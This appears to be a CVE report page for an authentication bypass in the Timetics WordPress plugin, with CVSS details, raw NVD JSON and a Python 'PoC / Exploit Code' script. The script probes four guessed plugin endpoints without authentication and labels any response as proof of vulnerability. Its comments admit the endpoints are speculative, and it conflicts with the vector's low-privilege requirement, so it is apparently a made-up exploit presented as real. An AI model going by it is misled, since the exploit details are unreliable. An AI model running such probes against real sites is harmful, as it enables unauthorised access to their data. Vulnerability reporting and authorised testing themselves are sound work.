Security Vulnerability Report
中文
CVE-2025-67915 CVSS 8.8 HIGH

CVE-2025-67915

Published: 2026-01-08 10:15:50
Last Modified: 2026-04-27 18:16:48

Description

Authentication Bypass Using an Alternate Path or Channel vulnerability in Arraytics Timetics timetics allows Authentication Abuse.This issue affects Timetics: from n/a through <= 1.0.46.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Timetics WordPress Plugin <= 1.0.46

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-67915 Timetics Authentication Bypass PoC # Target: WordPress site with Timetics plugin <= 1.0.46 TARGET_URL = "http://target-wordpress-site.com" def check_vulnerability(): """Check if target is vulnerable to CVE-2025-67915""" # Try to access admin functionality without authentication # The plugin may have unprotected AJAX or REST API endpoints endpoints = [ f"{TARGET_URL}/wp-json/timetics/v1/users", f"{TARGET_URL}/wp-json/timetics/v1/projects", f"{TARGET_URL}/wp-admin/admin-ajax.php?action=timetics_get_users", f"{TARGET_URL}/wp-admin/admin-ajax.php?action=timetics_admin_action" ] print("[*] Testing for Authentication Bypass (CVE-2025-67915)") print(f"[*] Target: {TARGET_URL}") for endpoint in endpoints: try: response = requests.get(endpoint, timeout=10) print(f"\n[+] Testing: {endpoint}") print(f" Status: {response.status_code}") # Check if we can access data without auth if response.status_code == 200: try: data = response.json() if data: print(f" [!] VULNERABLE: Received data without authentication") print(f" Data preview: {str(data)[:200]}") except: if len(response.text) > 0: print(f" [!] VULNERABLE: Received response without authentication") print(f" Response preview: {response.text[:200]}") elif response.status_code == 403: print(f" [-] Protected (403 Forbidden)") except requests.RequestException as e: print(f"[-] Error accessing {endpoint}: {e}") print("\n[*] Scan complete") print("[*] If vulnerable, upgrade Timetics plugin to latest version") if __name__ == "__main__": check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67915", "sourceIdentifier": "[email protected]", "published": "2026-01-08T10:15:50.343", "lastModified": "2026-04-27T18:16:48.463", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authentication Bypass Using an Alternate Path or Channel vulnerability in Arraytics Timetics timetics allows Authentication Abuse.This issue affects Timetics: from n/a through <= 1.0.46."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-288"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/timetics/vulnerability/wordpress-timetics-plugin-1-0-46-broken-authentication-vulnerability?_s_id=cve", "source": "[email protected]"}]}}